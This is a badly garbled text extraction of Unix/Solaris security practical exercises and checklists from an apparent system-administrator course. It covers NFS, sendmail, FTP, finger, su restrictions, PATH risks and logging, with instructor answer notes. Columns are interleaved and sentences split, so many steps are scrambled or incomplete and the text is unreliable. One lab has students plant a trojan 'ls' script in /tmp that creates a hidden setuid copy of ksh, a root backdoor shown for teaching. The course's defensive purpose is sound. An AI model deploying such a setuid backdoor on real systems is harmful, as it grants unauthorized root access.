g them harder to brute force decode) 
rm denial of service attacks (number of processes, 

amount of memory, etc) 
• Enable shadow passwords (see below) on the fly 
• allow specific users to login only at specific times from specific places 
• Create a password history file 
• Write your own PAM to lockout accounts after 3 failed login attempts. 
• Disable.rhosts lookup 
• Port over Linux modules to Solaris and other Unix platforms. 
 

istributions of Linux, such as Caldera, Debian, FreeBSD, Red Hat, SuSE.   

For Solaris, PAM is a separate software package. 
For Linux, it is available at: http://www.kernel.org/pub/linux/libs/pam/index.html

kerberos, and smart cards.  Rules can b
access high-security servers.  In additio

m
binaries.  
 

Just a few of the things you can do with PAM:   
• Use a non-DES encryption for your passwords. (Makin
• Set resource limits on all your users so they can't perfo

PAM is supported in Solaris 2.5 - Solaris 9 (see vendor documentation), and many 
d
   

 
 
 

gvh
UNIX PE2. Q2A. The accounts which allow for password authentification are the root, labuser1 and labuser2.  The /etc/passwd file can not be utilized to determine if an account has a password because Solaris implements the concept of shadowing.


gvh
UNIX PE2. Q3A.  The permissions on the /etc/passwd file are read for owner, group and other.


gvh
UNIX PE2. Q4A.  The difference between the /etc/passwd and the /etc/shadow file is that the /etc/passwd file contains general account information and the /etc/shadow file contains the account password information.


gvh
UNIX PE2. Q5A.  The difference in the permissions with the /etc/shadow file is root is the only account that can access the file.  The file containing the encrypted passwords can not be copied to another location for decryption.
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PURPOSE:  To gain some familiarity with default network settings and the necessary security 
adjustments.  
 
1. If you are not logged in as root, log in as root. 
 
2. NFS is the Network File System.  With NFS, a Unix/Linux user can share files between other 

sers.  The security involved is often weak.  Check the default settings on your system.  Type:  
# cat  /etc/nfssec.conf 

3.  What is the default security setting?  ___________________________________ 

4.  The present setting only requires a request to have generated from the proper system and user.  
These can easily be spoofed.  Stronger settings are available.  Some additional options are:  none; 
dh (Dif
encryp
 

.  Files are shared out by placing them in the distributed file system (/etc/dfs/dfstab).  Files we 
connect to are identified in the virtual file system (/etc/vfstab).  Take a look at the default 
distributed file system.  Nothing should be shared by default.  Type:  # cat  /etc/dfs/dfstab 
 
6.  You may have noticed in an earlier PE that port 25 (sendmail) has a habit of broadcasting its 
version number.  This is something best left for the hacker to guess.  Sendmail is an often hacked 
program and it does no good to share version information with the world.  Let's remove the version 
info from public access.   
 
7.  Edit the sendmail configuration file.  # dtpad /etc/mail/sendmail.cf 
 
8.  Click on edit and select find.  Search for Smtp.   This will send you to the line for the 
SmtpGreetingMessage.  Delete everything to the right of the $j entry.  This is what causes the 

ersion to be broadcast.  The next time the system boots up, the sendmail version will not be so 
easily obtained. 
 
9.  File transfers are a way of life for most IT personnel.  The FTP protocol is one of our most well 

nown and widely used.  Unix provides a way of controlling who is using FTP.  Check the FTP 

users) # cat /etc/ftpd/ftpusers 

Practical Exercise SAS-8F 
EXERCISE F 

u

 

 

fie Hellman); Kerberos.  Selecting dh would greatly increase security by requiring DES 
tion.  Kerberos is normally supplied only in the client form. 

5

v

k
access list by viewing the ftpusers file.   
(Solaris 8 users)# cat  /etc/ftpusers   (Solaris 9 

gvh
UNIX PE2. Q6A.  No the root account does not have a .profile, .login or a .cshrc file in it’s home directory.  The root account is created during installation and the skeletons for the files are not available.  The root account should have a .profile (or .login, .cshrc) if the default environment needs to be modified.  For example, the use of aliases.  If root does utilize these types of files then the file should be secured appropriately (read only for root).
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10.  What users on this system can use FTP?  
 
_______________________________________________________________________________ 

ake sure that the root Administrator and the system accounts are listed.  This 
counts that can not connect to the system to use FTP. 

r Name(localhost:root), enter:  labuser1 
 
14.  Enter the appropriate password:  student1 
 
15.  At the ftp> prompt, type:  help     
       (you should see the wide range of commands that ftp allows) 
 

6.  Exit your ftp session by typing:  quit 

7.  Assign a false shell to the labuser1 account:  # usermod -s /bin/false  labuser1 

18.  At the # prompt, type:  ftp localhost 

19..Wh
 
20.  Enter the appropriate password:  student1 
 
21.  Wh ?  
 

_____________________________________________________________ 
 
22.  Type:  quit 

4.  Add /bin/false on a new line, save the file, and exit the editor. 
 
25.  At the # prompt, type:  ftp localhost 
 
26.When prompted for a name, enter:  labuser1 
 
27.  Enter the appropriate password:  student1 

 
11.  At a minimum, m
is a list of those ac
 
12.  Let's test access to ftp.  At the # prompt, type:  ftp  localhost 
 
13.  When prompted fo

1
 
1
 

 
en prompted for a name, enter:  labuser1 

at happened

 _

 
23.  Now add the /bin/false shell to the /etc/shells file.  #dtpad /etc/shells 
 
2

gvh
UNIX PE2. Q16A.  Yes, the .profile ahs a ‘path’ statement.  Yes, the . could be considered a vulnerability.
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28.  Did the results from step 21 repeat?  What happens when you put a false shell in the /etc/shells 
file?  
______________________________________________________________________________ 

_____________________________________________________________________________ 

29.  Exit the ftp session, type:  quit 
 
30.  Remove the /bin/false entry from the /etc/shells file and reassign /bin/sh as labuser1's shell. 
 (hint:  dtpad /etc/shells)  (hint:  usermod  -s  /bin/sh  labuser1) 
 

1.  Finger is a service that gives us the ability to find out information on other users on other 

e usermod command to alter some information about labuser2.   
 
32.  # usermod -c ”(your name) loves Unix” labuser2 

33.  Le labuser2@localhost 
 
finge

 
_
 

3
systems.  Its very nature is intrusive.  It is an unnecessary service that can be turned off.  Lets use 
th

 
ts use finger to retrieve labuser2's account information.  # finger 

rd  
Vulnerability Countermeasure 

The Finger daemon can 
leak sensitive system 
information like 
usernames, home 
directories, and login 
patterns. 
 

 built in denial of 

ulnerability. 

�1.  IAW HQ DA SAIS-IAS message DTG R 050951Z MAR 
99, as stated in a number of previous alerts, unused or 
unnecessary ports and services should not be active.  Disable 
and/or disable at the network layer if possible all unused and 
necessary ports and services, e.g., rpc, tftp, gopher, smtp, 
http, finger, netstat, etc. Conduct risk assessments to 
determine if that port must remain open. 

Finger can provide a would-be intruder with a lot of 

• CONSIDER the finger information you provide and 

NOTE: Other services such as rusers and netstat may 
give out similar information.  

#grep finger /etc/inetd.conf 
 

To disable fingerd, put # in front of the line that starts with 
fingerd in /etc/inet/inetd.conf or  /usr/sbin/inetd.conf 
 

by changing the permissions to 500. 

 

The Finger daemon has  
a
service (DOS) information about your host. 
v

think about reducing the content by disabling finger or by 
replacing it with a version that only offers restricted 
information. 

• CONSIDER restricting access to finger (client service) 

#chmod 500 /usr/bin/finger 

gvh
UNIX PE2. Q18A.  The files of the /tmp directory were displayed; a file named .secret_ksh was created, the statement “Hello World” (without “ “) was displayed and the statement “This could be a bad program” (without “”) was displayed.


volzg
UNIX PE2. Q21B. Labuser1 would gain root access.

gvh
UNIX PE2. Q25A. The system default ls was executed.


gvh
UNIX PE2. Q26A.  The current owner is root.  The current group is sys.  The file permissions are read/execute for all and the SUID bit is set.  Everyone can execute this file.  The effective user id is root.  Yes, this could be a security vulnerability if someone could exploit the root account.
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• DO NOT use GNU finger v1.37 as it may allow intruders 
to read any file.  

 
 
34.  Did you see that the name column says you love Unix?  __________________ 

7.  Now shut down the finger service.  On your own, edit the /etc/inetd.conf file to turn off finger, 
r to PE SAS-8D steps 4 through 

38.  Test the finger service by repeating step 33.   
 
39.  Did you successfully stop the finger service?  ____________________ 
 
40.  Could you stop other unnecessary network services in a similar manner?  _____________ 
 
41.  Does the finger service still exist for internal users?________________________________ 
 

2.  Test it:    #finger labuser2 
 
43.  How would you disable the command for use by internal users?  

 
 

endmail  

 
35.  Lets see where the source info comes from for a finger search.  # cat /etc/passwd 
 
36.  Do you see your entries from step 32 recorded in labuser2's information?  ____________ 
 
3
stop and restart the inetd.  If you are having trouble doing this, refe
9. 
 

4

 
____________________________________________________________________  _

 
4.  END OF PE 4

 
 
 

S
Vulnerability Countermeasure 

Many v
relate t
overflow and input 
validation attacks.  In 
addition, Sendmail 
allowed attackers to 
pipe commands 

irectly to sendmail for 

ossible to gain 
privileged access.  

ulnerabilities 
o buffer 

d
execution.  It is also 
p

�1.  If you do not need Sendmail running, turn it off. 
• Remove or rename the sendmail startup script 

located in /etc/rc2.d/S88sendmail. Then restart 
Unix.  This will stop sendmail from listening to the 
network for incoming mail. 

• If you must run sendmail, do not run it as root.  Build 
a chroot environment and run it as a non-privileged 
user. 

send  outgoing mail.  You can set up cron so that 
sendmail will service the queue of outgoing messages 

• Sendmail is not required to listen to the network to 

gvh
UNIX PE2. Q26A.  Yes.


gvh
UNIX PE2. Q32A.  No, the command was not successful because labuser1 is not the owner of the file nor a member of the group.


gvh
UNIX PE2. Q36A Yes, the group name is now susers




PRACTICAL EXERCISES 
C2 PROTECT/SYSTEM ADMINISTRATOR AND NETWORK MANAGER SECURITY 

 

1-239 

Sendmail is a daemon 
at runs at root level. 

Older versions of 
sendmail allow 
pammers to relay mail 

n addition to abusing 

at participate in 

on the RBL (Realtime 
Blackhole List).  Many 

ail servers will 
isallow servers who 

mail se
RBL.  
 http://mail-

th
 

s
through your system.  
I
your resources, systems 
th
spamming can be listed 

m
d
try to connect from a 

rver on the 

abuse.org/rbl/  

on a schedule.  
• Stop sendmail from reporting the version during scans 

by editing the /etc/mail/sendmail.cf file. (change to 
SmtpGreetingMeesage=$j) 

• Stop the use of EXPN and VRFY.  Edit 
/etc/mail/sendmail.cf to show:  

grun,restrictmailq 

See section 7 of this document for additional information. 

 

PrivacyOptions=authwarnings,noexpn,novrfy,goaway,restrict

 

 
File Transfer Protocol (ftp) 

Vulnerability Countermeasure 
Another widely 
exploited service is 

�1.  DISABLE 
disabled by co

FTP.  It transmits 
m

file.  Additional s
passwords in the clear, 
and could give 
attackers root access to 
your system. If you do 
not have a need to run 
ftp on your server, then 
it should be disabled. 

ftp if you are not an ftp server.  FTP can be 
menting out the ftp line in the /etc/inetd.conf 
teps can be taken by commenting out port 

21 in the /etc/services file. 
 
NOTE: If you run ftp, make sure the /etc/ftpusers file has the 

root and system account names listed.  Also place any 
user account that you do not want to use ftp in this file.   

 
For additional information see section 7 

 
 
 

gvh
UNIX PE2. Q38A.  No, labuser2 is not the owner of the file nor a member of the group susers.


gvh
UNIX PE2. Q41A.  Yes, labuser1 is a member of the group susers.
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ISE G 

 
Network File System (NFS) Vulnerability PE 

 the fundamental weakness of NFS.  NFS allows 
for the accessing or sharing of files over the network.  This PE has the student setting up a simple 

le share, modifying the file, and checking the output for security issues. 

need to be logged in as root on their respective 
machines.   When ever you see the reference to three x’s (xxx), it refers to the last octet of the IP 
ddress.  The  symbol identifies where the space goes. 

1.  Both partner A and B will need to create a directory.  
     Type at the # prompt:  mkdir /testnfs 
 
3. Partner A needs to create a file in the /testnfs directory.   
      Type at the # prompt:  dtpad /testnfs/nfsfile 
 
3.  Partner A needs to put some text in the open file and then save it.  Once you’ve done that, go 
ahead and close dtpad. 
 
4.  Partner A needs to create a host table entry.   
     At the # prompt type:  dtpad /etc/hosts 
 
5.  On a new line, create an entry for your partner’s machine. 
      (example) 147.51.217.171 ws217171 
 
6.  Partner A now needs to share the file out by making an entry in the distributed file system 
table.  At the # prompt type:  dtpad /etc/dfs/dfstab 
 
7.  Partner A needs to create a share entry which gives partner B access.  Place the cursor on the 
beginning of the first free line and type the following entry. 
share –F nfs –o rw=ws217xxx,root=ws217xxx –d “nfs test” /testnfs 
 
8. Save your changes and close the text editor 
 
9.  Partner A needs to enable the share.  
      At the # prompt, type: /etc/init.d/nfs.server start 
 
10.  Partner A needs to set up the capturing of packets to analyze the network activity.  The first 

IP to use is Partner B and the second is Partner A.   
      At the # prompt, type:  snoop –o nfscap 147.51.217.xxx 147.51.217.xxx 

Practical Exercise SAS-8G 
EXERC
 

 
The purpose of this PE is to expose the student to

fi
 
This is a two partner PE and both partners will 

a
 

Kelly Larsen
(4-1)
sulog


Kelly Larsen
(4-2)
/var/adm/wtmp    


Kelly Larsen
(4-3)
/etc/utmp


Kelly Larsen
(4-4)
Displays the contents of the /var/adm/wtmp.  This will show you every time a user logs in or logs out.


Kelly Larsen
(4-5)
[BSD]Run the command "accton filename", where filename indicates where the info is to be stored.  /var/adm/acct is the normal location.  You should find the accton command in the /usr/etc or /usr/lib/acct directories.
[SystemV]Run the command  "/usr/lib/acct/startup".  Data will normally be stored in the /var/adm/pacct file.


Kelly Larsen
(4-6)
Account name, date, time, entry in the /etc/remote file that was used to make the call, phone number dialed, device used, and successful or unsuccessful connection.


Kelly Larsen
(4-7)
inetd -t


Kelly Larsen
(4-8)
Host configurable, uniform system logging facility.


Kelly Larsen
(4-9)
Simple program written in perl that is designed to monitor log files.




PRACTICAL EXERCISES 
C2 PROTECT/SYSTEM ADMINISTRATOR AND NETWORK MANAGER SECURITY 

 

1-241 

 
11.  Partner B can now check to see if the share is available.  You will use the dfshares 

and to check Partner A’s machine for the share.   
pt, type:   dfshares 147.51.217.xxx 

 see th unt it to 
access.  
 type:   s /testnfs 

ws for ed g achine.  
, type:  dtp

 see the f o rt of 
to the message that Partner A originally created.  Once you’ve done that, save 
ose the ed

saction s e 
packets cap c” key 

l-C.  This  capture of packets.   Partner A should be able to 
 see th new changes.  At the # prompt, type:  dtpad /testnfs/nfsfile 

iewing the file and making the appropriate comments to your partner, close the 

17. Partner A may now vie type:   
      snoop –i nfscap 
 
18. This will give you a rea  number of the very 

last packet captured as ir hexadecimal and ascii data.   
Lastnumber -20 refers t  that.  Your screen 
buffer will not hold all ave to be selective.  You may have to play 
with the packet number

      At the # prompt, type:  -10) 
  Example:

comm
      At the # prom

 
12.  Partner B should

a directory for 
      At the # prompt
 

lo

e share that Partner A made available.  Now it is time to mo
The IP is the IP of  Partner A.   

mount –F nfs –o rw 147.51.217.xxx:/testnf

13. Let’s see if it al
At the # prompt

 
14.   Partner B should

modification 
the file and cl

itin .  Partner B will now edit the file on Partner A’s m
ad /testnfs/nfsfile 

ile pen up in the desktop editor (dtpad).  Make some so

itor. 
 

15.  While this tran
been recording 
combination:  ctr
open the file and

wa  taking place, a counter on Partner A’s machine should hav
tured.  Partner A needs to hit the control key and “
 will stop the

e 
 

16. After v
editor. 

 
w the captured packet information.  At the # prompt, 

d out of the captured packets.  Remember the
we will now look at the packets and the
o your last packet number and subtract 20 from
of the packet data so we h
s to view the packet data. 
snoop –i nfscap –v –x 0 –p(lastnumber-20),(lastnumber

  snoop –i nfscap –v –x 0 –p82,92 
 
19. scroll up through the pa

modification that Partn the file.  
You’ll be looking at the

 
20.   The Ether header has  size, and time stamp.  The IP header has 

the source and destinati n port 
numbers.  The RPC hea  The NFS header has the file 
handle number and the 

 
21.  The packets mention a rack of 

files within NFS.  You will also notice that the port 2049 is used either as the source or 
destination port in each packet.    The big thing to notice is that information that is shared in 

ckets until you arrive at the packet that corresponds to the 
er B did to Partner A’s text file when Partner B saved 
 lines starting with NFS. 

the packet number, packet
on IP numbers.  The TCP header has the source and destinatio
der has the user credentials like UID. 
packet data payload. 

 file handle value.  This is the number that is used to keep t
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this manner is totally visible to anyone with the ability to capture the packet.  This is a clear 
text file sharing capability.   

 
22. NFS should be avoided  to transfer or share files.  There are a 

few security options tha in 
Solaris 9 is read only.  ormally 
we would also want to ctory on the 
receiving end.  Both the mands allow for specifying authentication 
mechanisms like Kerbe

 
23. End of PE. 

 
Network File System (N

 if possible.  Use sftp or scp
t can be set with NFS that we didn’t set.  The default mode 

We had to specifically give root write access for this PE.  N
specify the –nosuid option when we mount the dire
 share and mount com
ros or DES. 

FS)  
Vulnerability Countermeasure 

NFS allows transparent 
access to files and 
directories of remote 
systems as if they were 
stored locally. The 
impact varies 
depending on which 
vulnerabilities are 
present. In the worst 
case, intruders gain 
unauthorized root 
access from a remote 
host. 
 
Sharing  system related 
filesystems can occur 
when NFS is 
Misconfigured.   
 
Weak authentication is 
used.  Requests can be 
spoofed or sometimes 
proxied through the 
local portmapper. 

file 

n 

y patches 
" whenever possible. 

y

�1.  DO NOT use NFS if you do not need to export 
systems. 
• DISABLE NFS and related services, i.e. mountd, statd, 

and lockd. 
• Firewall protect your NFS server and block port 2049 o

the firewall 
• Keep up on NFS securit
• Share information as "read only

itl• BE AWARE that you implic  trust the security of the 
grity of the mounted files.  

 each other via NFS. That is, you are trusting 
the

• Use strong authentication in 

NFS server to maintain the inte
NOTE: A “web of trust” is created between hosts 
connected to

 security of any NFS server you use. 
the /etc/nfssec.conf file 

 
 
Refer to the CERT Advisory 94:15.  
http://www.cert.org/advisories/CA-

94.15.NFS.Vulnerabilities.html 

See section 7 of this document for additional information. 
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UNIX Account Security 

Practical Exercise SAS-9A 

PUR e students familiarity with the de d system accounts & to 
understand the security implica  
 
1. If you are not logged in as root, log 
 
Determine which user accounts a  
2. At the command prompt #, type

 
2A. Which accounts utilize s ount has a 
password with the /etc/passwd 

 
_____________________________________________________________________________ 
 
_____________________________________________________________________________ 
 
3. At the command prompt #, type

 
3A. What are the permissio  o

_____________________________________________________________________________ 
 
_____________________________________________________________________________ 
 
4. At the command prompt #, type: a
 

4A. What is the difference between the ? 
_____________________________________________________________________________ 
 
_____________________________________________________________________________ 
 
5. At the command prompt #, type : ls  –l /etc/shadow 
 

5A. What are the differences in permissions?  What implication does this have for security?  
Is shadowing important? 

 
_____________________________________________________________________________ 
 
_____________________________________________________________________________ 
 

EXERCISE A 
 

POSE:  To giv fault UNIX user an
tions in Section 4.0 of the UNIX checklist.

in as root. 

re currently active. Let’s take a look. 
: cat  /etc/passwd 

 pa sword authentication? Can you determine if an acc
file?  Why? ?   

: ls  –l /etc/passwd 

ns n this file? 

c t  /etc/shadow 

/etc/passwd and /etc/shadow files?  Is shadowing
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e’ve mentioned certain files that determine a user’s operating environment, e.g. .profile, 
n of programs in a user’s 

 

  

W
.login, and .cshrc.  Let’s see how these files can affect the executio
environment.   

6. At the command prompt #, type: ls  –la  / 
6A. Does the ‘root’ account have a .profile, .login, or .cshrc file in its home directory?
Why?  Should the root account have these types of files? 

 
              

t of CDE. 
 
8. Login as labuser1 
 
Typically, .profile, .login or .cshrc files have a modification to the PATH statement.  Let’s see 
how the PATH environment variable can be a security vulnerability. 

To exploit this vulnerability we need to create a script file.  This script file will execute the 
ls utility with the appropriate argument(s), make a copy of the ksh shell  and print two 
messages on the terminal  window. 

. At the command prompt $, type:  cd‸ /tmp 
10. At the command prompt $, type:  dtpad  ls 

Add the following lines to the file : 
  #!/bin/sh 

  
 cp   /usr/bin/ksh   /tmp/.secret_ksh   2>/dev/null & 
 chmod  4755   /tmp/.secret_ksh   2>/dev/null & 

  echo   “Hello world” 
 echo   “This could be a bad program” 

/usr/ bin/ls   $* 
Select File>Save to save the file. 
Right mouse click in the title bar and select Close to close the Text Editor. 

 
To make the script file executable, use the following command to change permissions on the 
file. 
11. At the command prompt $, type: chmod  755  ls 
 
Verify our script works by executing it. 
12. At the command prompt $, type:  /tmp/ls 

 
 
 

Verify the script is working correctly.  On the terminal the following should be displayed: 
1. the statement “Hello World” (without “ “) 
2. the statement “This could be a bad program” (without “”) 

 
7. Logou

 
9
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3. the files in the /tmp directory shall be displayed 

Minimize the footprints you have left on the system. 
pe:  rm  .secret_ksh 

prompt #, type:  cp  /etc/skel/local.profile  /.profile 
cat  .profile 

 

rofile to look first at the current directory for executables.  
 
At the command prompt #, type:  dtpad  .profile 
Move the . to the front of the PATH statement. 
 Originally the line looks like:  PATH=/usr/bin:/usr/ucb:/etc/:. 
 Change to PATH=.:/usr/bin:/usr/ucb:/etc 

 

contents of the /tmp 

18. Log
19. Login as root 
20. At the command prompt #, type:  cd  /tmp 

 

13. At the command prompt $, ty
 
14. Logout of CDE. 

ot 15. Login as ro
 
You have just took over as System Administrator of an existing system.  You would like to 
configure your environment on log in.  Since the bourne shell is your startup shell you will 
create a .profile file. 
 
16. At the command 
17. At the command prompt #, type:  
 

17A. Does the .profile have a ‘path’ statement?  If so, is there anything in that path that 
could be considered vulnerability? 

_____________________________________________________________________________ 
 
_____________________________________________________________________________ 
 
 

Let’s modify the .p

Select File>Save to save the file. 
Right mouse click in the title bar and select Close to close the Text Editor. 

 
It is standard practice as an administrator to periodically review the 
directory. 
 

out of CDE. 

Kelly Larsen
normally this will be root

Kelly Larsen
yes 

Kelly Larsen
This will vary in each class due to instructor and student habits

Kelly Larsen
This is dependent on what you got for 2b

Kelly Larsen
yes
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21. At the command prompt #, type:                                      ls -al 

ript?  Look carefully at the files that exist 
on the /tmp directory.  Were any new files recently created ?  If so, which ones?   

_____________________________________________________________________________ 
 
_____________________________________________________________________________ 
 

21B. What would be the result if labuser1 were to login and execute the command 
/tmp/.secret_ksh? (HINT- PE #1 Step 34) 
 

______________________________________________________________________________ 

2. At the command prompt #, type:   /.profile 

have the .: .   

rompt #, type:  cd  /tmp 
6. At rompt #, type:  ls -a 

 execute this time (the one in /tmp or the standard system file) ?  
le exist ?  What security vulnerability does the .secret_ksh file 

_____________________________________________________________________________ 
 
_____________________________________________________________________________ 
 

s you have seen in previous exercises, the su command (switch user), allows root to change 
NY user to execute the su 

a.  So, let’s restrict access to 
e ‘su

 
27. At t e com

27A. W
ho ca )?  Is this a security 

 
_____________________________________________________________________________ 
 
_____________________________________________________________________________ 
 

 
21A. What were the results of the running the sc

 
______________________________________________________________________________ 
 
Let’s try to fix the vulnerability. 

dtpad 2
 

Modify the file so that the path statement does not 
Select File>Save to save the file. 
Right mouse click in the title bar and select Close to close the Text Editor. 

 
23. Logout of CDE. 

ot 24. Login as ro
25. At the command p

the command p2
26A.  Which ls did you
Does the .secret_ksh fi
present? 

A
into any user account without a password.  UNIX will also allow A
ommand.  From a security point on view, this is NOT a good idec

th ’ command. 

h mand prompt #, type:  ls  –l /usr/bin/su 
ho is the current owner? What is the current group? What are the file permissions?  
n execute this file? Who does it execute as (effective user idW

vulnerability? 

Kelly Larsen
yes

Kelly Larsen
yes

Kelly Larsen
yes

Kelly Larsen
yes and yes

Kelly Larsen
yes
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28.  At the command prompt #, type:  su  labuser1 
29. At the command prompt $, type: /usr/bin/su  

hen requested, enter the root account password. 
 

28A. W
 
_____________________________________________________________________________ 

____________________________________ 

 
30. At it to quit the su  session. 
31. At e com session 
 
Change the permissions on the su command such that only the owner and group can execute 
the file
32. At the command prompt #, type:  ls  –l  /usr/bin/su 
 
33. At the command prompt #, type:  chmod 4550  /usr/bin/su 
 
34.At the command prompt #, type:  su  labuser1 

 

35. At the command prompt $, type:  /usr/bin/su 
35A. W sful? Why or why not? 

_____________________________________________________________________________ 
 
_____________________________________________________________________________ 
 
 
36. At the comm
 

 command. 

Create a new group called ‘susers.’ Click on ‘Browse,’ select ‘Groups’, then click on ‘Edit,’ 
then ‘Add.’  Accept the default group ID, make labuser1 a member of this group. Exit 
Admintool. 

38. At 

39A.  Did your changes take effect? (Is the group name different ?) 
 
_____________________________________________________________________________ 
 
Let’s test the new group. 

W

as the switching user to root successful? 

 
_________________________________________
 

the command prompt #, type:  ex
th mand prompt $, type :  exit to quit the su labuser1 

 

as the switching user to root succes

and prompt $ type: exit 

 Create a special group that will be utilized to identified users that can use the su
7. At the command prompt #, type:  admintool & 3

 

 
the command prompt #, type:  chgrp susers  /usr/bin/su 

 
39. At the command prompt #, type:  ls  –l  /usr/bin/su 

Kelly Larsen
yes

Kelly Larsen
yes
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0. At the command prompt #, type:  su  labuser2 

1. At 

 
_____________________________________________________________________________ 
 
_____________________________________________________________________________ 
 
42. At the comm
 
43. At 

 

44. At the command prompt $, type:  /usr/bin/su 

 

 
_____________________________________________________________________________ 
 
______

45. Exi
46. Exi

4

 

4 the command prompt $, type:  /usr/bin/su 
41A. Can you execute the ‘su’ command?  Why? 

and prompt $, type:  exit 

e command prompt #, type:  su  labuser1 th

When prompted, enter the root user password. 

44A. Can you execute the ‘su’ command?  Why? 

_______________________________________________________________________ 
 
 

t out of the root account (type exit). 
 out of the labuser1 account (type exit) t

Kelly Larsen
yes  If you shut down finger in a previous PE it may be a failure to connect
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Reading Assignment 5 
ractic l UNIX and Internet Security 
ay 4 
ages 641 - 677 

 
1. Which log file records if the su command was successful or not? 
 
 
 

P a
D
P
 

2. Which file records the last time each user logged in? 
 
 
 

ch file3. Whi  records who is currently logged in on a tty line? 

. How o you

 
6. What information does the aculog file store? 

. Whi  optio
 

8. What is the syslog facility?  
 

 
9. What is the SWATCH program? 

 

 
 
 
. What does the last command do? 4

 
 
 
5  d  turn on accounting? 
 
 

 
 
 
7 ch n allows for logging incoming network services? 

 
 

 

Kelly Larsen
yes

Kelly Larsen
The awk script prints out a list of directory and how much free space in each directory

Kelly Larsen
yes

Kelly Larsen
yes

Kelly Larsen
yes
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Log files 

Vulnerability Countermeasure 
Logs often harbor trace 
evidence of a crime.  
Logs are a good 
starting point to piece 

rred 
tem 

misleadning 
infomraion.  Securing 

e various log files on 
a UNIX system can 
mitigate this 
ulnerability. 

together what occu
on a computer sys 
or network.  
Unfortunately, log files 
have an inherent 

ulnerability in that v
they may 
 be forged and/or give 

th

v
 

�1.  IAW HQ DA SAIS-IAS message DTG R 050951Z 
MAR 99, all systems servers, as a minimum, shall have 
auditing turned on and reviewed for the following 
activities: 

• all logins and attempts 
• all service connection requests 

Logs often harbor trace evidence of a crime.   

• DO determine where your log files are located.  They are 
normally in the /var/log, /usr/adm, or /var/adm 
directories. 

 
#find / -name *log -print  

 
Note – there is both a syslog file which is a text file and an 
executable file named syslog which is used to update the 
syslogd from third party and home grown software. 
Important log files: 
lastlog – logs each user’s most recent successful login time, 
and possibly the last unsuccessful login too 
sulog – logs use of the su command  

a user 

syslog – a host-configurable, uniform system logging facility 
loginlog – records bad logins attempts (after 5 tries) 

d with the use of external 
s 

 system console and other 
nerated from the syslog  

 – records command run by every user 

r 

�2.  CONSIDER installing a PC or other machine as a 

• all ftp connections 
• all super user (root) connections, and requests.. 
 

 

utmp – records each user currently logged in 
utmpx – extended utmp 
wtmp – provides a permanent record of each time 
logged in and logged out. also records system shutdowns and 
startups 
wtmpx – extended wtmp 

vold.log – logs errors encountere
media, such as floppy disks/cdrom
xferlog – logs ftp access 
messages – records output to the
messages ge
acct or pacct
(accounting) 
.history - keeps a record of recent commands used by the 
use
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unsuccessful su attempts.  
ll su attempts are, by default, logged in /var/adm/sulog. 

This location is controlled in the /etc/default/su file. The 
entry: SULOG=/var/adm/sulog may be changed. 
#more /var/adm/sulog  
#more /var/adm/messages | grep su 
 
�4.  ENSURE that you turn logging and debugging on for ftp 

Modify the ftp entry as follows: 

unsuccessful attempts on Solaris an entry is made in the log.   
This can be varied in the /etc/default/login file. 
#ls -l /var/adm/loginlog.  If it does not exist as root, create 
/var/adm/loginlog 
#touch /var/adm/loginlog 
#chmod 600 /var/adm/loginlog  

rp sys /var/adm/loginlog 

#cat /var/adm/messages | grep keyword | more 
where keyword = FAILED, failed, FAILURES, su: or 
login: 

 
�7.  ENSURE that the permissions of all audit logs are set to 
640 or more restrictive. 

#ls –al /var/log 
#chmod 640 /var/log/* 

Note : remember to update all

network log server. 

�3.  REGULARLY monitor logs for successful and 

A

Edit /etc/inetd.conf 

ftp stream  tcp nowait root /usr/sbin/in.ftpd in.ftpd –dl  
 
�5.  CAPTURE repeated login failures. Create file 
/var/adm/loginlog. This file does not exist by default. After 5 

#chg
 
�6.  REGULARLY check for LOGIN REFUSED messages.  

 logs; not all log files are found 
in /var/log 

 
RUN last periodically to see who has been using the system. 
• TURN on accounting for all users. This will log every 

command run by every user.   
NOTE: This file will become quite large and should be either 

backed up or pruned daily. 
 
Syslog consists of 4 files 
syslog( ) - an application program interface (API) 
logger - a Unix command used to add single line entries to a 
system log 
/etc/syslog.conf - configuration file used to control the 
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logging and routing of system log events. 
Syslogd - system daemon used to receive and route system 

er program. log events from the syslog ( ) and logg

 

Syslog priorities and sources 
Vulnerability Countermeasure 

The daily/weekly 
requirement to review 
log files is complicated 
by the shear volume of 
information available.  
Care should be taken to 

iew log information 

p

ntries can be viewed 
n a weekly basis. 

�1.  Log information is affixed a priority. 
• Emerg - most immediate messages like system 

shutdown 
• Alert - system conditions require immediate attention 
• Crit - critical system conditions exist 
• Err - other system errors 

 messages 
tention at a later time 
s 

bugging purposes 
 
�2.  Log information has an originating facility 

• lpr - generated by printing system 
d by usenet news system 

ted by syslog itself for time stamping 

v
that is relevant and 

• Warning - warning

im ortant on a daily • Notice - notices requiring at
ssagebasis while lesser log • Info - informational me

• Debug - messages for dee
o

• User (default) - generated by user processes 
• kern - generated by kernel processes 
• mail - generated by e-mail processes 
• daemon - generated by system daemons 
• auth - generated by authorization programs 

• news - generate
• uucp - generated by uucp system 
• cron - generated by cron and at  
• local 0 thru 7 - generated by up to eight locally 

defined categories 
• mark - genera

logs 
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Simple Watcher (SWATCH)  (ACERT APPROVED) 
• is 

SWATCH is a program that is designed to monitor system activity and filter log files.  This 
onitors and scans log files for pattern matches specified by the system 

dm by the system administrator.  SWATCH's 
 file identifies what the program looks for and what it does when it locates a 

e 
scri
 
CVE-MAP-NOMATCH /Bugtraq 4746

CONSIDER running an automatic log monitor such as Swatch.  The Perl Compiler 
required for installation. 

 

package m
a inistrator and takes action as specified 
configuration
pattern match.  SWATCH can react in three different ways to triggers: email; page; execut

pts. 

:  Under some circumstances, a message may not be 
curs on a system numerous times, and swatch has 

placed a throttle on the event to prevent multiple alerts, swatch does not sufficiently handle 
events of the same type afterwards. When an event has occurred and alerts for the event are 

rottled, a bug in the swatch throttle code prevents swatch from reporting the event if it 
occurs a month later. 

 is available from: https://www.acert.belvoir.army.mil/ACERTmain.htm

reported by swatch. When an event oc

th

It  
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ging 

 or 
.  To do this PE, log into CDE as root and be at the root home directory of "/".  

Commands to type are written in bold.  Only type what is in bold.  The ‸ symbol indicates where 
you put in a space.   
 
1.  One of the logs in Unix tells you who is actually logged in the system and on what terminal.  
This log is a binary log called the utmpx file (utmp in older systems).  It can be read by the "who" 
or "w" command.  Other commands can access it but knowing these is fine for now.    Type:  # who 

 listed as being actively logged on the system? __________________ 

rred 
px 

 
 
 
 b.  Were any of the logins from IP addresses other than your own? ____________ 
 
 c.  Were any of the logins for accounts you haven't used?  ___________________ 
 

d.  If you answered yes to b or c, you may have experienced some unauthorized visits 
